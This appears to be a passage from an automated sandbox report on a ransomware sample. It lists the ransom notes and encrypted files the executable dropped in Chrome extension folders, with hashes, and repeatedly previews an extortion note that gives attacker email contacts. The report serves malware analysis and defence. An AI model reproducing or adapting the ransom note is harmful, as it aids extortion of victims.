                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\128.png.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.129599618059502
                  Encrypted:false
                  SSDEEP:96:i0nHmbe8Wvc6ygFwjH2de0mtFRrc+izo6GdIHEoKrZ3mkvN4eVL:5my8ITY5fRmo6GdIHEoIT4S
                  MD5:F51F858CE1842D6706DCDDDD33416ED5
                  SHA1:4A0B3D82E94E1E345755608BDB7CAED775A18D2E
                  SHA-256:3FF86803B9211C63464048E7D9D9BB429D73DC71B796C511A0A9D4BCC025B1C4
                  SHA-512:BF43119E6EDE0AF8D51501B53FAC477789D5A3CE82D37FE3F46EEF5555BA8019EFC1EDEBCDC32703F3F9A8A10C734A960E73544B29FD674599C72507B317C1BD
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ar\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\bg\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ca\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\cs\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\da\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\de\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\el\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\en\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\es\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fi\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fil\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fr\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\he\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hi\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hr\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hu\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\id\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\it\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ja\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ko\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lt\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lv\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\nl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\no\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ro\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ru\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\th\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\tr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\uk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\vi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_metadata\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
